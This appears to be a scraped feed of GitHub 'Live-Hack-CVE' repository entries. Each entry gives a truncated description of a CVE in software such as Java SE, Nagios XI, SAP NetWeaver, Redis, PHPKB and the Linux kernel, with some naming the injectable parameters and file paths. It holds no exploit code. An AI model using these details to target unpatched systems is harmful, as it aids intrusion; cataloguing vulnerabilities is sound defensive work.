**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Windows DLL). The supported version that is affected is Java SE: 8u202. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. While the vulnerability is in Java SE, atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2699](https://github.com/Live-Hack-CVE/CVE-2019-2699) create time: 2022-12-29T09:04:36Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to comprom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2684](https://github.com/Live-Hack-CVE/CVE-2019-2684) create time: 2022-12-29T09:04:32Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to com CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2602](https://github.com/Live-Hack-CVE/CVE-2019-2602) create time: 2022-12-29T09:04:28Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u201, 8u192 and 11.0.1; Java SE Embedded: 8u191. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Su CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2426](https://github.com/Live-Hack-CVE/CVE-2019-2426) create time: 2022-12-29T09:04:25Z

**Command injection in Nagios XI before 5.5.11 allows an authenticated users to execute arbitrary remote commands via a new autodiscovery job. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9164](https://github.com/Live-Hack-CVE/CVE-2019-9164) create time: 2022-12-29T09:03:54Z

**SQL injection vulnerability in Nagios XI before 5.5.11 allows attackers to execute arbitrary SQL commands via the API when using fusekeys and malicious user id. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9165](https://github.com/Live-Hack-CVE/CVE-2019-9165) create time: 2022-12-29T09:03:51Z

**Nagios IM (component of Nagios XI) before 2.2.7 allows authenticated users to execute arbitrary code via API key issues. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9202](https://github.com/Live-Hack-CVE/CVE-2019-9202) create time: 2022-12-29T09:03:40Z

**Authorization bypass in Nagios IM (component of Nagios XI) before 2.2.7 allows closing incidents in IM via the API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9203](https://github.com/Live-Hack-CVE/CVE-2019-9203) create time: 2022-12-29T09:03:36Z

**SQL injection vulnerability in Nagios IM (component of Nagios XI) before 2.2.7 allows attackers to execute arbitrary SQL commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9204](https://github.com/Live-Hack-CVE/CVE-2019-9204) create time: 2022-12-29T09:03:33Z

**Privilege escalation in Nagios XI before 5.5.11 allows local attackers to elevate privileges to root via write access to config.inc.php and import_xiconfig.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9166](https://github.com/Live-Hack-CVE/CVE-2019-9166) create time: 2022-12-29T09:03:29Z

**Cross-site scripting (XSS) vulnerability in Nagios XI before 5.5.11 allows attackers to inject arbitrary web script or HTML via the xiwindow parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9167](https://github.com/Live-Hack-CVE/CVE-2019-9167) create time: 2022-12-29T09:03:19Z

**WavPack 5.1.0 and earlier is affected by: CWE-457: Use of Uninitialized Variable. The impact is: Unexpected control flow, crashes, and segfaults. The component is: ParseCaffHeaderConfig (caff.c:486). The attack vector is: Maliciously crafted .wav file. The fixed version is: After commit https://github.com/dbry/WavPack/ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010317](https://github.com/Live-Hack-CVE/CVE-2019-1010317) create time: 2022-12-29T09:03:15Z

**An issue was discovered in Poppler through 0.78.0. There is a divide-by-zero error in the function SplashOutputDev::tilingPatternFill at SplashOutputDev.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14494](https://github.com/Live-Hack-CVE/CVE-2019-14494) create time: 2022-12-29T09:01:33Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2983](https://github.com/Live-Hack-CVE/CVE-2019-2983) create time: 2022-12-29T09:00:32Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2981](https://github.com/Live-Hack-CVE/CVE-2019-2981) create time: 2022-12-29T09:00:28Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u221, 8u212 and 11.0.3. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2745](https://github.com/Live-Hack-CVE/CVE-2019-2745) create time: 2022-12-29T09:00:17Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2978](https://github.com/Live-Hack-CVE/CVE-2019-2978) create time: 2022-12-29T09:00:06Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2973](https://github.com/Live-Hack-CVE/CVE-2019-2973) create time: 2022-12-29T08:30:01Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Scripting). Supported versions that are affected are Java SE: 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2975](https://github.com/Live-Hack-CVE/CVE-2019-2975) create time: 2022-12-29T08:29:57Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2933](https://github.com/Live-Hack-CVE/CVE-2019-2933) create time: 2022-12-29T08:29:54Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Kerberos). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2949](https://github.com/Live-Hack-CVE/CVE-2019-2949) create time: 2022-12-29T08:29:50Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2945](https://github.com/Live-Hack-CVE/CVE-2019-2945) create time: 2022-12-29T08:29:47Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2958](https://github.com/Live-Hack-CVE/CVE-2019-2958) create time: 2022-12-29T08:29:43Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JCE). The supported version that is affected is Java SE: 8u212. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2842](https://github.com/Live-Hack-CVE/CVE-2019-2842) create time: 2022-12-29T08:29:40Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2786](https://github.com/Live-Hack-CVE/CVE-2019-2786) create time: 2022-12-29T08:29:36Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2816](https://github.com/Live-Hack-CVE/CVE-2019-2816) create time: 2022-12-29T08:29:33Z

**A regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1920](https://github.com/Live-Hack-CVE/CVE-2020-1920) create time: 2022-12-29T09:10:48Z

**Insufficient validation of BIOS image length by ASP Firmware could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12944](https://github.com/Live-Hack-CVE/CVE-2020-12944) create time: 2022-12-29T09:07:31Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35164](https://github.com/Live-Hack-CVE/CVE-2020-35164) create time: 2022-12-29T09:06:47Z

**HTMLCreator release_stable_2020-07-29 was discovered to contain a cross-site scripting (XSS) vulnerability via the function _generateFilename. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28919](https://github.com/Live-Hack-CVE/CVE-2022-28919) create time: 2022-12-29T09:06:40Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Improper Input Validation Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35169](https://github.com/Live-Hack-CVE/CVE-2020-35169) create time: 2022-12-29T09:06:33Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35168](https://github.com/Live-Hack-CVE/CVE-2020-35168) create time: 2022-12-29T09:06:29Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35167](https://github.com/Live-Hack-CVE/CVE-2020-35167) create time: 2022-12-29T09:06:26Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35166](https://github.com/Live-Hack-CVE/CVE-2020-35166) create time: 2022-12-29T09:06:22Z

**An out-of-bounds (OOB) memory access flaw was found in x25_bind in net/x25/af_x25.c in the Linux kernel version v5.12-rc5. A bounds check failure allows a local attacker with a user account on the system to gain access to out-of-bounds memory, leading to a system crash or a leak of internal kernel information. The high CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35519](https://github.com/Live-Hack-CVE/CVE-2020-35519) create time: 2022-12-29T09:04:57Z

**An exploitable SQL injection vulnerability exists in the ‘entities/fields’ page of the Rukovoditel Project Management App 2.7.2. The heading_field_id parameter in ‘‘entities/fields’ page is vulnerable to authenticated SQL injection. An attacker can make authenticated HTTP requests to trigger this vulnerability, this ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13588](https://github.com/Live-Hack-CVE/CVE-2020-13588) create time: 2022-12-29T09:03:47Z

**jp2/opj_decompress.c in OpenJPEG through 2.3.1 has a use-after-free that can be triggered if there is a mix of valid and invalid files in a directory operated on by the decompressor. Triggering a double-free may also be possible. This is related to calling opj_image_destroy twice. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15389](https://github.com/Live-Hack-CVE/CVE-2020-15389) create time: 2022-12-29T09:03:44Z

**An exploitable SQL injection vulnerability exists in the ‘entities/fields’ page of the Rukovoditel Project Management App 2.7.2. The entities_id parameter in the 'entities/fields page (mulitple_edit or copy_selected or export function) is vulnerable to authenticated SQL injection. An attacker can make authenticated HTT CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13589](https://github.com/Live-Hack-CVE/CVE-2020-13589) create time: 2022-12-29T09:03:26Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-failed-login.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10447](https://github.com/Live-Hack-CVE/CVE-2020-10447) create time: 2022-12-29T09:03:08Z

**jsonparser 1.0.0 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a GET call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35381](https://github.com/Live-Hack-CVE/CVE-2020-35381) create time: 2022-12-29T09:03:05Z

**SAP Business Objects Business Intelligence Platform (Live Data Connect), versions 1.0, 2.0, 2.1, 2.2, 2.3, allows an attacker to logon on the Central Management Console without password in case of the BIPRWS application server was not protected with some specific certificate, leading to Missing Authentication Check. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6242](https://github.com/Live-Hack-CVE/CVE-2020-6242) create time: 2022-12-29T09:03:01Z

**SAP NetWeaver AS ABAP Business Server Pages Test Application IT00, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, does not sufficiently encode user-controlled inputs, resulting in reflected Cross-Site Scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6217](https://github.com/Live-Hack-CVE/CVE-2020-6217) create time: 2022-12-29T09:02:58Z

**SAP Commerce, versions - 6.6, 6.7, 1808, 1811, 1905, does not process XML input securely in the Rest API from Servlet xyformsweb, leading to Missing XML Validation. This affects confidentiality and availability (partially) of SAP Commerce. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6238](https://github.com/Live-Hack-CVE/CVE-2020-6238) create time: 2022-12-29T09:02:54Z

**The way comments in article.php (vulnerable function in include/functions-article.php) are handled in Chadha PHPKB Standard Multi-Language 9 allows attackers to execute Stored (Blind) XSS (injecting arbitrary web script or HTML) in admin/manage-comments.php, via the GET parameter cmt. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10461](https://github.com/Live-Hack-CVE/CVE-2020-10461) create time: 2022-12-29T09:02:51Z

**Path Traversal in admin/assetmanager/assetmanager.php (vulnerable function saved in admin/assetmanager/functions.php) in Chadha PHPKB Standard Multi-Language 9 allows attackers to list the files that are stored on the webserver using a dot-dot-slash sequence (../) via the POST parameter inpCurrFolder. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10459](https://github.com/Live-Hack-CVE/CVE-2020-10459) create time: 2022-12-29T09:02:47Z

**Path Traversal in admin/imagepaster/operations.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete any folder on the webserver using a dot-dot-slash sequence (../) via the GET parameter crdir, when the GET parameter action is set to df, causing a Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10458](https://github.com/Live-Hack-CVE/CVE-2020-10458) create time: 2022-12-29T09:02:40Z

**Path Traversal in admin/imagepaster/image-renaming.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to rename any file on the webserver using a dot-dot-slash sequence (../) via the POST parameter imgName (for the new name) and imgUrl (for the current file to be renamed). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10457](https://github.com/Live-Hack-CVE/CVE-2020-10457) create time: 2022-12-29T09:02:30Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/trash-box.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10456](https://github.com/Live-Hack-CVE/CVE-2020-10456) create time: 2022-12-29T09:02:20Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/sitemap-generator.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10454](https://github.com/Live-Hack-CVE/CVE-2020-10454) create time: 2022-12-29T09:01:54Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/translate.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10455](https://github.com/Live-Hack-CVE/CVE-2020-10455) create time: 2022-12-29T09:01:50Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/search-users.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10453](https://github.com/Live-Hack-CVE/CVE-2020-10453) create time: 2022-12-29T09:01:44Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/save-article.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10452](https://github.com/Live-Hack-CVE/CVE-2020-10452) create time: 2022-12-29T09:01:40Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-user.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10451](https://github.com/Live-Hack-CVE/CVE-2020-10451) create time: 2022-12-29T09:01:36Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-traffic.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10450](https://github.com/Live-Hack-CVE/CVE-2020-10450) create time: 2022-12-29T09:01:15Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/report-search.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10449](https://github.com/Live-Hack-CVE/CVE-2020-10449) create time: 2022-12-29T09:01:11Z

**A use-after-free flaw was found in nci_request in net/nfc/nci/core.c in NFC Controller Interface (NCI) in the Linux kernel. This flaw could allow a local attacker with user privileges to cause a data race problem while the device is getting removed, leading to a privilege escalation problem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4202](https://github.com/Live-Hack-CVE/CVE-2021-4202) create time: 2022-12-29T09:11:35Z

**Node.js < 12.22.9, < 14.18.3, < 16.13.2, and < 17.3.1 did not handle multi-value Relative Distinguished Names correctly. Attackers could craft certificate subjects containing a single-value Relative Distinguished Name that would be interpreted as a multi-value Relative Distinguished Name, for example, in order to injec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44533](https://github.com/Live-Hack-CVE/CVE-2021-44533) create time: 2022-12-29T09:11:32Z

**It was discovered that the update for the virt:rhel module in the RHSA-2020:4676 (https://access.redhat.com/errata/RHSA-2020:4676) erratum released as part of Red Hat Enterprise Linux 8.3 failed to include the fix for the qemu-kvm component issue CVE-2020-10756, which was previously corrected in virt:rhel/qemu-kvm via CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20295](https://github.com/Live-Hack-CVE/CVE-2021-20295) create time: 2022-12-29T09:11:28Z

**It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45046](https://github.com/Live-Hack-CVE/CVE-2021-45046) create time: 2022-12-29T09:11:03Z

**SAP Web Dispatcher versions - 7.49, 7.53, 7.77, 7.81, KRNL64NUC - 7.22, 7.22EXT, 7.49, KRNL64UC -7.22, 7.22EXT, 7.49, 7.53, KERNEL - 7.22, 7.49, 7.53, 7.77, 7.81, 7.83 processes allow an unauthenticated attacker to submit a malicious crafted request over a network to a front-end server which may, over several attempts, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38162](https://github.com/Live-Hack-CVE/CVE-2021-38162) create time: 2022-12-29T09:10:42Z

**A certain template role in SAP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, contains transport authorizations, which exceed expected display only permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40504](https://github.com/Live-Hack-CVE/CVE-2021-40504) create time: 2022-12-29T09:09:11Z

**Two methods of a utility class in SAP NetWeaver AS ABAP - versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, allow an attacker with high privileges and has direct access to SAP System, to inject code when executing with a certain transaction class builder. This could allow execution of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44235](https://github.com/Live-Hack-CVE/CVE-2021-44235) create time: 2022-12-29T09:09:08Z

**SAP NetWeaver ABAP Server and ABAP Platform, versions - 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 804, does not create information about internal and external RFC user in consistent and distinguished format, which could lead to improper authentication and may be exploited by malicious users to obtain illeg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27610](https://github.com/Live-Hack-CVE/CVE-2021-27610) create time: 2022-12-29T09:08:23Z

**SAP NetWeaver ABAP Server and ABAP Platform, versions - 700, 702, 730, 731, 804, 740, 750, 784, expose functions to external which can lead to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33677](https://github.com/Live-Hack-CVE/CVE-2021-33677) create time: 2022-12-29T09:08:19Z

**SAP NetWeaver AS ABAP and ABAP Platform, versions - KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 8.04, 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.53, 7.77, 7.81, 7.84, allows an att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33684](https://github.com/Live-Hack-CVE/CVE-2021-33684) create time: 2022-12-29T09:08:16Z

**There are multiple Denial-of Service vulnerabilities in SAP NetWeaver Application Server for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755. An unauthorized attacker can use the public SICF service /sap/public/bc/abap to reduce the performance of SAP NetWeaver Application Server ABAP and ABAP Platf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40495](https://github.com/Live-Hack-CVE/CVE-2021-40495) create time: 2022-12-29T09:08:13Z

**SAP NetWeaver AS ABAP and ABAP Platform - versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38181](https://github.com/Live-Hack-CVE/CVE-2021-38181) create time: 2022-12-29T09:08:09Z

**SAP Internet Communication framework (ICM) - versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 785, allows an attacker with logon functionality, to exploit the authentication function by using POST and form field to repeat executions of the initial command by a GET request and exposing sensitive CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40496](https://github.com/Live-Hack-CVE/CVE-2021-40496) create time: 2022-12-29T09:08:06Z

**The software logistics system of SAP NetWeaver AS ABAP and ABAP Platform versions - 700, 701, 702, 710, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, enables a malicious user to transfer ABAP code artifacts or content, by-passing the established quality gates. By this vulnerability malicious code can reach quality CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38178](https://github.com/Live-Hack-CVE/CVE-2021-38178) create time: 2022-12-29T09:08:02Z

**In SAP NetWeaver AS for ABAP and ABAP Platform - versions 701, 702, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 786, an attacker authenticated as a regular user can use the S/4 Hana dashboard to reveal systems and services which they would not normally be allowed to see. No information alteration or denial o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42067](https://github.com/Live-Hack-CVE/CVE-2021-42067) create time: 2022-12-29T09:07:59Z

**A vulnerability was found in the Linux kernel's EBPF verifier when handling internal data structures. Internal memory locations could be returned to userspace. A local attacker with the permissions to insert eBPF code to the kernel can use this to leak internal kernel memory details defeating some of the exploit mitiga CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4159](https://github.com/Live-Hack-CVE/CVE-2021-4159) create time: 2022-12-29T09:07:38Z

**The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.1-13 didn’t mimic the permissions of the JVM being patched, allowing it to escalate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3100](https://github.com/Live-Hack-CVE/CVE-2021-3100) create time: 2022-12-29T09:06:44Z

**.A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges. This race condition in net/can/bcm.c in the Linux kernel allows for local privilege escalation to root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3609](https://github.com/Live-Hack-CVE/CVE-2021-3609) create time: 2022-12-29T09:06:15Z

**A vulnerability has been identified in SIMATIC PCS 7 V8.2 (All versions), SIMATIC PCS 7 V9.0 (All versions), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP1), SIMATIC WinCC V15 and earlier (All versions < V15 SP1 Update 7), SIMATIC WinCC V16 (All versions < V16 Update 5), SIMATIC WinCC V17 (All versions < V17 Update 2), SI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40363](https://github.com/Live-Hack-CVE/CVE-2021-40363) create time: 2022-12-29T09:06:01Z

**Redis is an open source, in-memory database that persists on disk. When using the Redis Lua Debugger, users can send malformed requests that cause the debugger’s protocol parser to read data beyond the actual buffer. This issue affects all versions of Redis with Lua debugging support (3.2 or newer). The problem is fixe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32672](https://github.com/Live-Hack-CVE/CVE-2021-32672) create time: 2022-12-29T09:05:57Z

**Redis is an open source, in-memory database that persists on disk. When parsing an incoming Redis Standard Protocol (RESP) request, Redis allocates memory according to user-specified values which determine the number of elements (in the multi-bulk header) and size of each element (in the bulk header). An attacker deliv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32675](https://github.com/Live-Hack-CVE/CVE-2021-32675) create time: 2022-12-29T09:05:54Z

**A vulnerability has been identified in SIMATIC PCS 7 V8.2 (All versions), SIMATIC PCS 7 V9.0 (All versions), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP1), SIMATIC WinCC V15 and earlier (All versions < V15 SP1 Update 7), SIMATIC WinCC V16 (All versions < V16 Update 5), SIMATIC WinCC V17 (All versions < V17 Update 2), SI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40360](https://github.com/Live-Hack-CVE/CVE-2021-40360) create time: 2022-12-29T09:05:50Z

**Redis is an open source, in-memory database that persists on disk. The redis-cli command line tool and redis-sentinel service may be vulnerable to integer overflow when parsing specially crafted large multi-bulk network replies. This is a result of a vulnerability in the underlying hiredis library which does not perfor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32762](https://github.com/Live-Hack-CVE/CVE-2021-32762) create time: 2022-12-29T09:05:40Z

**Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This prob CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32626](https://github.com/Live-Hack-CVE/CVE-2021-32626) create time: 2022-12-29T09:05:36Z

